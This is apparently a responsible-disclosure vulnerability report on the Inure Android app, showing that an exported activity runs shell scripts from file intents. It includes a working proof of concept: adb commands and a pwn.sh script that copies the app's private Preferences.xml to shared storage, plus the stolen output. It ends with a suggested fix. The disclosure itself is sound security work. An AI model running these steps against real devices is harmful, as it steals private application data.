Description

Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation) which accepted intent data via the file scheme + text/x-shellscript mime type and executed the commands contained within those opened files via RunScript.java.

\

Since this activity is exported, it is possible for an installed malicious application to send an intent to this activity in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application's internal directory (/data/data/app.simple.inure/) and exfiltrate it into /sdcard where the attacker could read the retrieved information.

Proof of Concept

1. Setup a directory on the sdcard

PS C:\Users\Acer> adb shell  
angelica:/ $ cd /sdcard  
angelica:/sdcard $ mkdir inure-proof-of-concept  
angelica:/sdcard $ cd inure-proof-of-concept/  
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" > pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 10  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh

2. Perform the attack via an adb command:

PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/pwn.sh" -n app.simple.inure/.activities.association.BashAssociation  
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/pwn.sh cmp=app.simple.inure/.activities.association.BashAssociation }

3. Review the files on the directory we created in step 1, we can see that the Preferences.xml file was exfiltrated:

angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 14  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml  
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<int name="main_app_launch_count" value="5" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app  
.simple.inure.activities.association.BashAssociation}: java.io.FileNotFoundException: /sdcard/inure-proof-of-concept/inu  
re-root-id-test.sh: open failed: ENOENT (No such file or directory)</string>  
<long name="crash_timestamp" value="1691896905717" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>

Impact

An application's internal directory and the files within it should never be accessible by other applications within a device. The vulnerability reported demonstrates that it is possible for malicious third-party applications to steal data belonging to the Inure app's private directory through the execution of malicious bash scripts. A recommended fix would be to set the exported attribute of the activity to false, or to apply the inure.terminal.permission.RUN_SCRIPT permission on the affected functionality.